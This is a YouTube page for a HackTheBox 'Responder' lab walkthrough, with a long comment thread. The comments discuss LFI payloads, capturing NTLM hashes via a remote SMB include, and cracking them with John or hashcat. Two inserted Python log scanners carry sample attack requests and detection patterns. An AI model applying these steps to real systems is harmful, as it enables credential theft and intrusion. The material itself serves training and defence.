
Tier 1: Responder - HackTheBox Starting Point - Full Walkthrough 

CryptoCat

Learn the basics of Penetration Testing: Video walkthrough for the "Responder" machine from tier one of the @HackTheBox "Starting Point" track; "you need to walk before you can run". We'll be exploring the basics of enumeration, service discovery, Local File Inclusion (LFI), Remote File Inclusion (RFI), NTLM hash grabbing with Responder, hash cracking (John the Ripper), evil-winrm and more! Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂 #HackTheBox #HTB #CTF #Pentesting #OffSec
↢Video-Specific Resources↣
book.hacktricks.xyz/pentestin...
www.sikich.com/insight/using-...
book.hacktricks.xyz/pentestin...
↢Chapters↣
Start: 0:00
Enumerate ports/services (NMap): 0:19
Wappalyzer/Nikto/Gobuster: 1:45
WinRM/evil-winrm: 5:20
Local File Inclusion: 6:55
LFI PHP filter Trick: 11:00
RFI + Responder = NTLM Hashes: 12:04
Crack hash with John: 17:04
Shell with evil-winrm: 17:58
End: 19:13

Published: 3 Jul 2024

Comments: 203
@thenextdoorpanda6181 2 years ago
Fkn lifesaver dude! Been stuck on that LFI question for days, because of the way they had formatted it. The answer they wanted made no sense to me - had they presented them in bullet points, it would've been much more clear - I genuinely just got confused as they had 3 strings back to back. Also, didn't think to add the IP to my /etc/hosts file & was wondering why it wouldn't connect to the website; thx! Keep up the great work, man!
@_CryptoCat 2 years ago
I was thinking a multiple choice option would be better there as well! It would be good to see that implemented in future so they can use a mix of text entry and multiple choice questions. Thanks mate 🙏🥰
@retro-tvhead4883 2 years ago
awesome thank you so much for this guide, I'm still very new so a little extra help here was needed. You talked the process and explained things very well. Helpful videos like this mean it's less likely that people will quit when they hit a bit of a wall as i did here, I will run the process through a few times again solo, just to grasp it all. Again many thanks.
@_CryptoCat 2 years ago
thank you mate! appreciate the positive feedback 🙏🥰
@patrickmoloney672 5 months ago
Your walkthroughs are incredible. Thank You.
@_CryptoCat 5 months ago
Thank you!! Much appreciated 🥰
@stig7160 1 year ago
Amazing walkthrough! It really helps that you show us how you are moving forward and how you are googling to learn all the different things needed. I did this box before I saw your video, but I didn't manage to get through it without having a peek at the walkthrough provided on htb as I didn't really know about the responder and it didn't show up in any of my google searches either. But searching for the exact TCP port like you did would have probably gotten me on the right track :)
@_CryptoCat 1 year ago
Thank you! 🙏🥰
@EliteBuildingCompany 10 months ago
I've been struggling for a few days trying to connect with certain machines, looking at hundreds of forum posts, and all i needed to do was add the address to host file, which i did learn ages ago btw lol. Really happy i stumbled on this video, thanks for the upload.
@_CryptoCat 10 months ago
Haha it happens! Even if the final answer was something you knew, you're developing research skills in the process 😉
@EliteBuildingCompany 10 months ago
@@_CryptoCat Indeed, i'm about to be the best researcher this side of England lol, thanks again.
@JohnS677 2 months ago
Dude, you're my hero! I couldn't figure out why responder was picking up my local router instead of the htb IP. I was using wlan0 instead of tun0. Thanks so much!
@AstraGamesStudios 7 months ago
THANK YOU SO MUCH! I love how you show different methods and hacks! Keep it up!
@_CryptoCat 7 months ago
Thank you!! 💜
@bj76681 2 years ago
Thanks for this video buddy :) good one.
@athimngqundaniso8509 2 years ago
You are a lifesaver!!! And you've earned a new subscriber 🤝🏽
@athimngqundaniso8509 2 years ago
For the responder, I kept getting the set.daemon() deprecated error so I was unable to see the hash code. Do you perhaps know how to go about solving that?
@_CryptoCat 2 years ago
Hmmm it might be similar to this: code.djangoproject.com/ticket/32638 Try and run with an earlier version of Python (not 3.10) and/or double-check you're using the latest Responder: github.com/lgandx/Responder
@erica.5620 2 years ago
Was praying for a walkthrough. I don't like that flags aren't randomly generated per-person on htb, but on instances where I physically can't reach the flag because of a bug and not being able to use a tool just being able to progress the starting point is really helpful. Loved the approach as well CryptoCat, thanks!
@_CryptoCat 2 years ago
thanks! happy to help 🥰
@safesploit 2 years ago
Also worth noting, HTB Starting Point in the top-right of their respective tab for the challenge have 'Open Walkthrough' which is a PDF write-up on the CTF.
@_CryptoCat 2 years ago
@@safesploit Yep, same as for retired boxes! The walkthroughs are excellent, I always recommend reviewing them after solving a machine as they contain a lot of background info that you wouldn't get from solving the box alone, but will improve overall understanding 🙂
@Death_User666 1 year ago
make more I subbed ive been stuck on this one for almost 2 months
@Z0nd4 1 year ago
Thank you very much!
@pawelk3k 1 year ago
thank you for this video, i had a dns problem! And thanks to you I was able to solve this problem and then look for information on the internet
@_CryptoCat 1 year ago
Excellent! 🔥
@idodo329 1 year ago
Well done bruv, your hacking skills are insane! keep it up, your videos are great!!
@_CryptoCat 1 year ago
Thanks mate! 👊
@cyberhound_tech_781 2 years ago
@cryptocat Thank you for the Video.. I was stuck and needed help. This was what I needed. Thanks!
@_CryptoCat 2 years ago
thanks mate 🥰
@karthikbt7239 9 months ago
Thank you for this. This machine was too tough for me and I still need to understand a lot of what you did but very insightful video
@_CryptoCat 9 months ago
🙏🥰
@toxicrootvip7264 2 years ago
Thanks !
@ProdMonte 5 months ago
You are the best out here
@_CryptoCat 5 months ago
🥰🥰🥰
@git-tauseef 2 years ago
Subscribed and followed on Twitter 💕
@_CryptoCat 2 years ago
ty 🥰
@Riushda1 1 year ago
Nice video ! I feel like this challenge is much more difficult than the other one of the same tier, I was able to do the other challenges by myself but without the write-up I wouldn't have been able to complete this one.
@_CryptoCat 1 year ago
I agree, this one was a bit trickier than others!
@karthikbt7239 9 months ago
Exactly. I am a beginner and this challenge is quite confusing
@user-vf5lj4dc2x 2 years ago
Respect! thx
@_CryptoCat 2 years ago
💜
@git-tauseef 2 years ago
Just 💕 wow!!
@_CryptoCat 2 years ago
💜
@htsec4923 2 years ago
Nice effort
@_CryptoCat 2 years ago
thanks mate 🥰
@br_nidas 1 year ago
thanks guy :D
@ShahrinRahman 2 years ago
@_CryptoCat 2 years ago
thank you 🙏🥰
@tamim8574 1 year ago
Nice video
@_CryptoCat 1 year ago
ty 🙏
@Suviiii69 8 months ago
❤❤amazinggg
@_CryptoCat 8 months ago
ty 💜💜
@ivanyursek3661 1 year ago
@CryptoCat thank you very much for this walkthrough. It was very informative! I just have one question (and this is one of the things that has been baffling me in my journey to becoming a Red Teamer thus far: choosing the right tools for the job). Why did you choose Evil Winrm? Could SSH have done the same job?
@_CryptoCat 1 year ago
thanks mate 🥰 the SSH port was closed on this one, otherwise that would have been a great option! winrm would have done the job fine (connecting to that 5985 port) but evil-winrm has some powerful functionality: github.com/Hackplayers/evil-winrm
@BroodPitt 2 years ago
Nice video!! little thing with that samba //10.10.14* you need to listen on the samba port not port 80 😃
@_CryptoCat 2 years ago
Oh yeh, that makes sense 😂 Thanks 🥰
@Aslamkaztro 1 year ago
❤❤❤❤
@_CryptoCat 1 year ago
💜
@firecasts 1 year ago
THANKS FOR THE TIP ON 12:18 sometimes HEADACHE IS NOT SUFFICIENT TO FIND THE ANSWER
@ryanwalker4660 1 year ago
where do you get these wordlist files for john? I'm guessing that a lot of these tools are pre-installed in kali and you would have to figure out how to get them installed for a different distro or maybe if it is pre-installed in kali maybe just load up that distro and grab the wordlist I need?
@_CryptoCat 1 year ago
Yep, kali and parrot will come with a lot of tools and should have some wordlists in /usr/share/wordlists by default. You can also install a repo of wordlists with "sudo apt-get install seclists" but if on a non-kali/parrot machine you might need to manually clone the git repo: github.com/danielmiessler/SecLists
@rottenfanger 7 months ago
awesome, thanks for the video ! I tried adding /etc/hosts in WSL, but I still can't open unika.htb, I use windows. Does WSL configuration not come in-line with windows?
@_CryptoCat 7 months ago
Hey, thanks! You can edit the hosts file in Windows as well, it's in System32/drivers/etc/ - www.hostinger.co.uk/tutorials/how-to-edit-hosts-file
@DoDo-uw2no 2 years ago
Hey I really liked your video. I have one problem which makes nmap scans very painful for me. Doing the same scan as you takes me a whopping 30-40 minutes. If I use -T4 as an option it takes about 15 minutes... Any idea what might be causing such slow scanning times? Of course scanning only the first 1000 ports doesn't take that long but that made me miss the WinRM port the first time I was scanning :/ Any advice you can give me to troubleshoot this issue?
@_CryptoCat 2 years ago
Thanks 🥰 They can take a while but 30-40 minutes seems way too long! It might be worth trying another site e.g. TryHackMe, to try and identify whether the problem is with your connection to HackTheBox, or your network/config more generally. For HTB you could try and regenerate your VPN pack or swap server / upgrade to VIP to see if that helps. Lastly, you can run NMap with the verbose flag, so you at least see the open ports as they are discovered 😉
@DoDo-uw2no 2 years ago
@@_CryptoCat Thanks for the reply! I am already VIP. I switched VPN over UDP which improved my speeds. It's still not as fast as yours but it's ok: 10-13 minutes to scan all ports of one IP address. Thanks for hinting me in the right direction :)
@TheSkulldraw 1 year ago
Hey thanks for this video! I was wondering how I could find the LFI vulnerability (AKA the windows host file) on the target without the help of the htb questions. And I’m struggling because the vulnerable page displays an error which is considered by gobuster as a 400 status. So every path tried is considered a success. I could also try to add ../ until I find what I want but it’s not a very efficient way ? How would you do it ? Thanks again for the video it is very helpful!
@_CryptoCat 1 year ago
You can use the --exclude-length option if all responses return the same response code, e.g. "don't show any responses that are 100 bytes long". You could also switch to a tool like ffuf, that allows you to filter by response code, length *or* regex, so you could just filter out the responses with an error message 🙂
@Manu-se5tx 5 months ago
Hi I have a question, basically what we are doing is using LFI, we "create" A server that then we access by the target forcing it to authenticate with NTLM (that we are hosting to get the challenge hashed with the password) to then crack the challenge to get the password and then access the winrm, my question is what is the point if we have to guess the password anyways? Wouldn't unhashing the challenge be the same as guessing the password directly? Is it to not get noticed too much by avoiding to brute force a login?
@_CryptoCat 5 months ago
You're right, IRL you'd rather avoid detection (and lockouts) by cracking the hash rather than the password. Apart from that, cracking the hash locally removes the network dependency and should be much faster with a good GPU. Even better, you might find the hash has already been cracked by someone else! Finally, you can use the hash directly for relay attacks (although unfortunately not pass-the-hash).
@Manu-se5tx 5 months ago
@@_CryptoCat got it thank you!
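How the requests discussed in this thread look from the web server's side: an added example (not from the video or the commenters) that scans access-log lines for a file-include parameter carrying directory traversal, a stream wrapper such as php://filter, or a UNC path that would make a Windows host authenticate outbound over SMB. The log lines are constructed, and the parameter name `page`, the rule names and the function names are assumptions of this example.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed Apache-style access-log lines; addresses, paths and sizes are made up.
SAMPLE_LOG = """\
10.10.14.7 - - [03/Jul/2024:10:00:01 +0000] "GET /index.php?page=about.html HTTP/1.1" 200 4512 "-" "Mozilla/5.0"
10.10.14.7 - - [03/Jul/2024:10:00:09 +0000] "GET /index.php?page=../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824 "-" "Mozilla/5.0"
10.10.14.7 - - [03/Jul/2024:10:00:15 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 61532 "-" "Mozilla/5.0"
10.10.14.7 - - [03/Jul/2024:10:00:21 +0000] "GET /index.php?page=%2F%2F10.10.14.7%2Fshare HTTP/1.1" 200 310 "-" "Mozilla/5.0"
10.10.14.7 - - [03/Jul/2024:10:00:30 +0000] "GET /index.php?page=..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 92 "-" "curl/8.0"
10.10.14.9 - - [03/Jul/2024:10:01:02 +0000] "GET /css/style.css HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Client address and request target from a common/combined log line.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Each rule names one way an include parameter can leave its intended directory.
RULES = [
    # ../ or ..\ anywhere in the value
    ("traversal", re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")),
    # scheme://... (php://filter, http://, ftp://, ...)
    ("wrapper", re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)),
    # //host/share or \\host\share: on Windows this triggers an SMB connection
    ("unc", re.compile(r"^(?:\\\\|//)[^\\/]+")),
    # C:\... or a single leading slash
    ("absolute-path", re.compile(r"^(?:[a-z]:[\\/]|/(?!/))", re.I)),
]


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %252e) so rules see the final value."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(value):
    """Return the names of all rules that the decoded parameter value matches."""
    decoded = decode_fully(value)
    return [name for name, rx in RULES if rx.search(decoded)]


def scan(log_text, param="page"):
    """Return (line number, client, decoded value, rule names) per suspicious request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        _, _, query = m.group("target").partition("?")
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            hits = classify(value)
            if hits:
                findings.append((lineno, m.group("client"), decode_fully(value), hits))
    return findings


if __name__ == "__main__":
    for lineno, client, value, hits in scan(SAMPLE_LOG):
        print(f"line {lineno}: {client} {','.join(hits)}: {value}")
```

Log matching like this is a backstop; the application-side fix is to map the parameter to a fixed allow-list of page names instead of passing it to an include.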
@Thommm63 2 years ago
Hi and thank you for this great tuto! Small question, at 56 seconds you open a new menu with the "G" key? Is this part of TLDR? I can't access this menu... Thank you in advance for your answer :)
@_CryptoCat 2 years ago
Good question! I should have mentioned that is "navi", a tool that was recently recommended to me. It allows you to add (or create) cheatsheets and easily execute them: github.com/denisidoro/navi
@Thommm63 2 years ago
@@_CryptoCat Thank you so much for sharing and for your work. Good continuation :)
@tomerbalkai 1 year ago
@@_CryptoCat Hi, I searched through the web and couldn't find any way to install the tool. could you help out? I am struggling with this for 2 days now
@_CryptoCat 1 year ago
@@tomerbalkai There's a few ways to install it, if you check here (scroll down): github.com/tldr-pages/tldr You'll see an option to install with npm or python. I probably used the python method, e.g. "pip install tldr". edit: sorry, I realised you are talking about navi, not tldr. I can't remember if I used the "cargo" install method or the install script: github.com/denisidoro/navi/blob/master/docs/installation.md - you can also download the pre-compiled binary and add it to your path so quite a few options to try 😉
@susgreg 10 months ago
Which repo did you import for "navi" tool to have these records?
@_CryptoCat 10 months ago
Hey, good question. There are some security-focused cheatsheets on the navi repo as well as some external, e.g. github.com/esp0xdeadbeef/cheat.sheets or, you can create your own. In all honesty, I don't use it very often but I guess if you get in the habit of using it in your day-to-day, it's good.
@adeenmum111 1 month ago
I'm not getting my hash in responder it is listening for events, the ip of listener is the same I give in url but nothing happens. Any idea why?
@_CryptoCat 19 days ago
Hmmmm double-check each step in the vid, or check the official PDF walkthrough as it might use a slightly different approach. You might find additional troubleshooting steps on hackthebox forums/discord 🙂
@MegaFartinyourface 2 years ago
Hi, i keep getting the [!] Error: tun: Interface not found. What did i do wrong?
@_CryptoCat 2 years ago
check 'ifconfig' and make sure you have a tun0 adapter, that should indicate you are connected to the VPN
@tomdev6701 2 years ago
Hi and thanks for this! In navi what do you use as cheat sheet? You have 817 of them. Are these custom ones?
@_CryptoCat 2 years ago
ermmm tbh I haven't really used many of them 😂 I just installed whatever security related ones I could find linked to the navi github. My friend put together these cheat sheets though, which I'd definitely recommend for pentesting: github.com/esp0xdeadbeef/cheat.sheets
@tomdev6701 2 years ago
@@_CryptoCat Nice for nmap ! :) tks a lot!!!
@skiball9105 1 year ago
For the subl part? In sublime text editor, do I need to type the screen at 2:23? Or is there a file I need to download to be able to view the website? When i downloaded subl, it comes up as blank
@_CryptoCat 1 year ago
try and open up "/etc/hosts" in subl, you should have it on linux system with some default text in there
@skiball9105 1 year ago
@@_CryptoCat thank you!!!!!
@mendelsmith4005 1 year ago
i just wanted to know that how did you answer the windows service listening port question which was the second last question, and the answer was 5985, but how did you deduce that answer
@_CryptoCat 1 year ago
Hmmm I probably just knew this already, as the WinRM service (5985) is exploited a lot in pentesting. If you didn't know, you could check the NMap scan and google each of the ports/services. You could probably find it in the evil-WinRM documentation as well.
@jijobuje 10 months ago
In my case responder is not producing any hash. What can be the problem?
@_CryptoCat 10 months ago
Hey, did you solve it? If not, double check the steps in the video and official PDF walkthrough.. If everything is the same, it should work 🙂
@adeprince 2 years ago
I keep getting this error when i try to launch the responder using "sudo python Responder -I ..." /Responder.py", line 42 print color("[!] Responder must be run as root.") which git repository did you clone from
@_CryptoCat 2 years ago
I don't think I used git repo, AFAIK it comes with parrot os (I know it does kali).. Try to run your Responder.py with sudo privs
@sev7463 2 years ago
I had the same issue, here's what worked for me: "sudo python2 Responder.py -I tun0" Use "python2" instead of "python". This allowed me to intercept the NTLM hash without the error anymore. Hope this helps.
@joseph2187 2 years ago
Damn I installed tldr but when I run 'tldr nmap' it says 'No tldr entry for nmap' :'(((((((
@joseph2187 2 years ago
Nvm... I had to update it using 'tldr -u' Eat that LSD everybody!!! 👾🐔
@_CryptoCat 2 years ago
haha good advice 😂
@n0pl4c3 2 years ago
Navi actually looks like a really interesting tool, I'll note that one down. May I ask which repo you got the cheatsheet for nmap etc. from, or is that one selfmade?
@_CryptoCat 2 years ago
I installed this one: github.com/esp0xdeadbeef/cheat.sheets and some of the security related ones from the Navi repo. I really need to put my own commands into the cheatsheet but I cba 😂
@n0pl4c3 2 years ago
@@_CryptoCat Thanks a lot, definitely a nice tool though, that I could see becoming all the more useful under time pressure at a ctf or something, nothing worse than sitting there in the last hour getting stuck when forgetting about how a tool exactly worked again.
@kaiahnung8326 1 year ago
@@_CryptoCat hey, i can't manage to install the shell widget on kali. i get this error message: navi widget fish | source source: not enough arguments Command 'navi' not found, did you mean: command 'savi' from deb savi command 'nvi' from deb nvi command 'navit' from deb navit command 'nabi' from deb nabi Try: sudo apt install so ctrl + g doesn't work for me.
@_CryptoCat 1 year ago
@@kaiahnung8326 Did you follow the instructions on the GitHub? github.com/denisidoro/navi
@kaiahnung8326 1 year ago
@@_CryptoCat yeah but something went wrong. however, i tried it with brew and it works pretty well now. thanks.
@lostshadow828 11 months ago
i don't understand why add the ip and domain to etc/hosts ?
@_CryptoCat 11 months ago
It's mostly just so that you don't need to remember the IP address, i.e. it's easier to memorize responder.htb than 10.123.18.90. Often the websites will use links like responder.htb/login as well, so if you don't have it set in the hosts file, it simply won't know where to resolve. Also, if you want to enumerate subdomains, you'll first need to have the domain linked via /etc/hosts.
@NimbleSF 1 year ago
Hey this was really great. As someone who is a true beginner I'm not really sure if the point of these boxes is to just stump me or what lol. It says "Very Easy" but someone who is new to the world of pentesting sure wouldn't know what Responder is.
@_CryptoCat 1 year ago
Thanks and you're totally correct, HTB is hard.. even when it is "easy". That's especially true when you're new to cybersecurity (maybe IT in general). You'll learn through the struggle though 🙂
@tylertbone9 1 year ago
I get an OpenSSL::digest initialization error when trying to connect to the evil-winrm. I’m using the VPN and am stuck. Any idea why?
@_CryptoCat 1 year ago
check this out: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342/4
@tylertbone9 1 year ago
@@_CryptoCat thanks for the quick response. Ended up just running a base kali Linux iso on my VirtualBox and got it to work. I think wsl2 kali Linux has some issues with this. Better practice for me to use a VirtualBox anyways. Thanks again! Great videos and really helping me learn
@dororix9047 1 year ago
Hey man, for some reason my responder keeps on listening without giving me any hash. Do you know why that might be? I'm using my own kali machine
@_CryptoCat 1 year ago
Not too sure, I would suggest to double-check the steps in the video and/or official PDF walkthrough
@iyyananugrah8234 1 year ago
Can I get help with this error message when using evil-winrm "Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error Error: Exiting with code 1 " I tried at my laptop using ubuntu 22.04.1 LTS or pwnbox, the result is same error,
@_CryptoCat 1 year ago
It's a problem with the OpenSSL version: forum.hackthebox.com/t/evil-winrm-error-on-connection-to-host/257342 You can update your OpenSSL library OR use this quick fix: forum.hackthebox.com/t/lab-access-openvpn-certificate-verify-failed/257102/2
@loeffelatom 1 year ago
when connecting with evil-winrm i always get: Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is execution expired, pls i need help 😥
@_CryptoCat 1 year ago
Could be a lot of things, I'd recommend to check forum.hackthebox.com/search?q=evil-winrm%20error or ask in the discord - discord.gg/hackthebox
@karemtalli1339 1 year ago
Nice video! there's something I don't get though, I understand virtual hosting and why we need to add the ip address to the /etc/hosts file. I understand the server wouldn't know to which hostname to redirect the browser if we type in the ip address without that. However I don't understand why if we type the hostname in the browser (without updating /etc/hosts) the page won't load. can you explain on that ? thanks.
@_CryptoCat 1 year ago
Thanks, and sure! When we type the hostname into the address bar, e.g. responder.htb, the browser will attempt to resolve the DNS. It will ask the OS, "what is the IP address for responder.htb?". First, the OS will look in the /etc/hosts file and see if there's an entry for responder.htb. If so, it will return that IP and redirect the browser accordingly. If there is no entry for responder.htb it will reach out to DNS servers, e.g. Google, and ask if they know which IP address is associated with the domain. Since responder.htb isn't a real website (.htb isn't even a valid TLD), no DNS server will be able to find an IP, so our only option is to add an entry to /etc/hosts. Hopefully I understood your question properly and the answer made sense 😁
@karemtalli1339 1 year ago
@@_CryptoCat Yes perfect that explains it. thanks a lot
@anonymousprogramming4800 1 year ago
Hi, May I know which distribution are you using ?
@anonymousprogramming4800 1 year ago
I mean which Linux version?
@_CryptoCat 1 year ago
I'm running the latest version of Parrot OS: www.parrotsec.org/
@Dillonwrx 1 year ago
I expected same app on my android, if it is possible share a googleplay link please
@_CryptoCat 1 year ago
App for what??
@GeratTheGreat 2 years ago
keep getting this error when trying to run responder "Error starting TCP server on port 3389, check permissions or other servers running.", anyone else have this or know how to fix?
@_CryptoCat 2 years ago
are you running with sudo? do you have something running already on port 3389 (RDP)?
@PratikPol 21 days ago
​@@_CryptoCat I am also getting the same error as @GeratTheGreat. And yes on port 3389 I have a RDP Session because I am doing on Practice-Labs. Is there a way to change port of Responder instead.
@jaz11350 2 years ago
Having an issue with adding the host file. I added it to subl but my page is still black
@_CryptoCat 2 years ago
sometimes it takes a while.. think i saw ippsec show how to force refresh it before but i can't remember. maybe try to close browser and clear cache.
@jaz11350 2 years ago
@@_CryptoCat i ran it through burp and I'm getting a 200 but just a blank screen lol
@jaz11350 2 years ago
And I didn't think of that 😕 duh
@jdkillianjdk724 2 years ago
Hey ! Nice one ! I was struggling with this one.. I didn't add the /etc/hosts so i can't see the website nor use responder well. Btw my john --wordlist=path hash didn't show me cracked password i've tried some other command, deleting ~/.john/john.pot but still don't have it :/ Any ideas ?
@_CryptoCat 2 years ago
hmmm you can try run it with the --show flag, although I think it might just use the potfile. are you using the same rockyou wordlist? should work!
@jdkillianjdk724 2 years ago
@@_CryptoCat Well i retry with the exact same file and command and it worked uhu I probably made a mistake somewhere ! Thanks :D
@alteo8588 2 years ago
I had the same issue and fixed it. It was because the rockyou.txt file was zipped. I simply unzipped it: sudo gzip -d /usr/share/wordlists/rockyou.txt.gz I'm assuming you're on Kali Linux as this is where the wordlist is located by default.
@b4kug0u8 1 year ago
don't know if there's any chance for someone to answer but here i am: Succeed to get the Admin hash with responder, but when it comes to john, when my hash.txt is "Administrator :: Responder : xxxxxxx" john says to me that "No password hashes loaded" and when I put only "xxxx" with no "Administrator:: Responder:" john tells me that he loaded 2 passwords with no different salts aaaand... that's all so far. No mdp, no more infos. What do i do wrong please ?
@_CryptoCat 1 year ago
Ermm try it with hashcat, e.g. "hashcat -m 5600 hash_file.txt /path/to/wordlist.txt"
@b4kug0u8 1 year ago
@@_CryptoCat Ok it worked just fine thanks :) Why do you think it didn't with John, any idea?
@_CryptoCat 1 year ago
@@b4kug0u8 hmmm not sure, maybe the format wasn't quite right or you need to specify the format manually
@yassinehzami1670 1 year ago
can i do tNice tutorials with the trial version?
@_CryptoCat 1 year ago
With the trial version of what??
@cipher3966 2 years ago
Why does listening for events never work for me? It just shows nothing
@_CryptoCat 2 years ago
Which part of video you at? I don't think my netcat listener got a hit either (as I had wrong port).
@jokecrash7217 2 years ago
i have an issue using john , where the session is completed but i get no password output and idk what to do really
@biba7859 2 years ago
you did it? same issue...
@jokecrash7217 2 years ago
@@biba7859 i also tried to output to a file to see if anything changed and i tried to see in the .pot file john is creating for the passwords both failed both files came out empty as if john is not producing any output and sth i found interesting there where it shows the numbers of guesses my sessions end with 0gs
@SamOween 2 years ago
@@jokecrash7217 What OS are you using?
@_CryptoCat 2 years ago
Hmmm I had a look through GitHub issues but couldn't see much, unless this helps: github.com/openwall/john/issues/4852 github.com/openwall/john/issues/5074
@biba7859 2 years ago
@@vrikha I did it with nano. I'll also try this, but I'm not sure if it will help.
@alwan7777 2 years ago
please share your terminal .bashrc file😁 that's really cool bro
@_CryptoCat 2 years ago
It's just the standard parrot config IIRC, here's a terminal colour scheme: imgur.com/a/EXSO6l0 - the only thing is if you use scripts like linPEAS, the colours are not very useful 😂
@alwan7777 2 years ago
@@_CryptoCat thanks😎🔥🔥
@BOMBPHONICS 1 year ago
Easily my new favorite website but my lord am I behind. I have so much to learn. I'm fascinated and borderline retarded at the same time it seems
@_CryptoCat 1 year ago
You'll get there! 🙂
@mandalorian2010 1 year ago
I am not able to get the hash from responder, and I have done everything exactly the same to replicate this
@_CryptoCat 1 year ago
Double check all the steps in the video and the official PDF walkthrough.. Probably something small somewhere
@francesco2092 1 year ago
so, tldr nmap ok, but with ctrl+g nothing happens
@_CryptoCat 1 year ago
This is for the navi cheatsheets right? I remember having to setup the hotkey manually but not sure how I did it.. tbh I never use it 😂
@francesco2092 1 year ago
@@_CryptoCat aaaaah ok! thank you
@owengamingtubesucks5865 1 year ago
When I change the /etc/hosts it does nothing
@_CryptoCat 1 year ago
Hmmm you can't access the domain name? Make sure it's "/etc/hosts" rather than "etc/hosts/"
@owengamingtubesucks5865 1 year ago
@@_CryptoCat i appreciate the fast reply, tried again today with a new ip and it worked fine so not really sure what was going on yesterday. Thank you anyway
@_CryptoCat 1 year ago
@@owengamingtubesucks5865 Excellent 👍
@joseph2187 2 years ago
Brehh wut theme is that my Gangster?
@_CryptoCat 2 years ago
for the terminal? imgur.com/a/EXSO6l0 the only problem is.. with some tools colour coding is very helpful e.g. LinPEAS. You can have multiple colour profiles though and easy swap between them 😉
@joseph2187 2 years ago
@@_CryptoCat hell yeah thanks man!
@exaq 1 year ago
evil-winrm just tells me that there's no route to host even though i did everything correctly the first time (i hope) then re-did it when i found this video to make sure
@_CryptoCat 1 year ago
hmmm were you able to ping the box? sounds like connectivity issues.
@yogeshcs2003 1 year ago
You have to enter the ip address given on the htb account (it is different for everyone) and not the ip given on the document. You can check on google how to add entry on etc/host which is very easy. You are putting the wrong ip which is the problem. I faced the same issue but now solved this problem and I am able to view the website on the browser.
@exaq 1 year ago
@@yogeshcs2003 i entered the correct ip address from the hackthebox website, i was able to connect to the box but couldn't install a reverse shell on it
@exaq 1 year ago
@@_CryptoCat yeah i was
@yogeshcs2003 1 year ago
@@exaq ok in reverse shell you have to enter your ip in the url. Type ifconfig then see tun0 line where you will get your ip address.
@BOMBPHONICS 1 year ago
seems handy as shit but tldr doesn't work
@_CryptoCat 1 year ago
Did you install it? 😁
@BOMBPHONICS 1 year ago
@@_CryptoCat I got it
@nuridincersaygili 2 years ago
At last I found a mentor... Thank you so much! Here I got a few small open points. 1) When we injected the attacker ip address via page parameter, why did the victim try to authenticate? How does the victim know that it should send the username and hashed password to authenticate? Furthermore, is it possible to capture that request via netcat with something like -lnvp? I learnt that when a server got an authentication request, it should transmit a challenge to the requester, but still I thought that I can use netcat to prove RFI is possible. Why can't I catch them via netcat? Why should we add a wrapper such as "php://filter/convert.base64-encode/resource=index.php" to see the contents of index.php? Why did it not work the first time? What precaution forces us to add this while we can get the contents of the file "hosts.txt" easily? Thanks
@_CryptoCat 2 years ago
Hi mate, thanks for the support! For your first question (on how the authentication request works), I would recommend reviewing the article that I skimmed over in the video: www.sikich.com/insight/using-multirelay-with-responder-for-penetration-testing Your second question; if you setup a netcat listener on SMB port you should see some request from the RFI (I incorrectly used HTTP port in video, which presumably does not have outbound access). Although that should give some response, you would responder to say "I am the machine you are looking for" in response to each of the requests. Final question; We need the PHP filter trick to read PHP files because the vulnerable code is using the "include" function. If we try to access PHP files without the filter, they will be included (executed) and we won't see the source code. Any other extensions e.g. txt should be fine to read without a filter. Hope that helped, all the best 😊
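Added example (not part of the comment thread or the video): a defender-side Python check that labels the `page` parameter values discussed in the reply above, so the PHP filter wrapper and the remote SMB include show up in web access logs. The log lines, address, file names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the video or the box).
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jul/2024:10:00:01 +0000] "GET /index.php?page=about.html HTTP/1.1" 200 512
198.51.100.7 - - [03/Jul/2024:10:00:09 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096
198.51.100.7 - - [03/Jul/2024:10:00:15 +0000] "GET /index.php?page=//192.0.2.10/share HTTP/1.1" 200 300
198.51.100.7 - - [03/Jul/2024:10:00:21 +0000] "GET /index.php?page=..%2f..%2fhosts.txt HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify_page_param(value):
    """Label one URL-decoded parameter value by the inclusion risk it signals."""
    v = value.replace("\\", "/")
    if v.startswith("//"):
        # UNC path: a Windows host including it opens SMB and attempts NTLM auth.
        return "remote-unc"
    if WRAPPER_RE.match(v):
        # Stream wrapper such as php://filter, used to read PHP source unexecuted.
        return "stream-wrapper"
    if ".." in v.split("/") or re.match(r"[a-z]:/|/", v, re.I):
        return "path-escape"  # traversal or absolute path outside the web root
    return "plain"

def scan(log_text, param="page"):
    """Return (label, value) for every suspicious value of `param` in the log."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for value in parse_qs(query).get(param, []):
            label = classify_page_param(value)
            if label != "plain":
                findings.append((label, value))
    return findings

if __name__ == "__main__":
    for label, value in scan(SAMPLE_LOG):
        print(f"{label:15} {value}")
```

The same labels can drive a server-side allow-list: only values that classify as "plain" and match a known page name should ever reach `include`.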
6 months ago
